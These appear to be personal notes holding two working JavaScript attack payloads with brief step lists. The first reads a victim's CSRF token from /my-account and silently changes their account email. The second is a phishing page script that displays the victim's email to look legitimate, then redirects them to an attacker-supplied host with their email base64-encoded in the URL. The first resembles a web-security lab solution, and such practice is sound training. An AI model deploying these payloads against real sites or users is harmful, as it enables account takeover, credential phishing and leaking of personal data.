<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=t3st@test.com')
};
</script>
Go to the account page
Make POST request to change email
Remember supply necessary parameter (can get from burp post request)
CSRF placing email bot from parameter and redirecting it to another host
<script>
function onWindowLoad() {
const urlParams = new URLSearchParams(window.location.search);
const email = urlParams.get('email');
const destination = urlParams.get('url');
var xhr = new XMLHttpRequest();
xhr.open('GET', destination, true);
xhr.send();
fetch(destination);
var outputCdc = document.getElementById("gf-user");
outputCdc.innerText=`${email}`;
}
window.onload = onWindowLoad;
function redirected() {
const urlParams = new URLSearchParams(window.location.search);
const destination = urlParams.get('url');
const email = urlParams.get('email');
const emailb = btoa(email);
if (destination) {
window.location.href = destination + "&key=" + emailb;
} else {
window.location.href = 'defaultPage.html';
}
}
</script>
Obtain email and url from victim opened linkurl will be used as redirected host
Place the value of email into the input box as placeholder (to trick victim thinking its legit website)
When victim press the Proceed button , they get redirected to url + key where key is their email encrypted in base64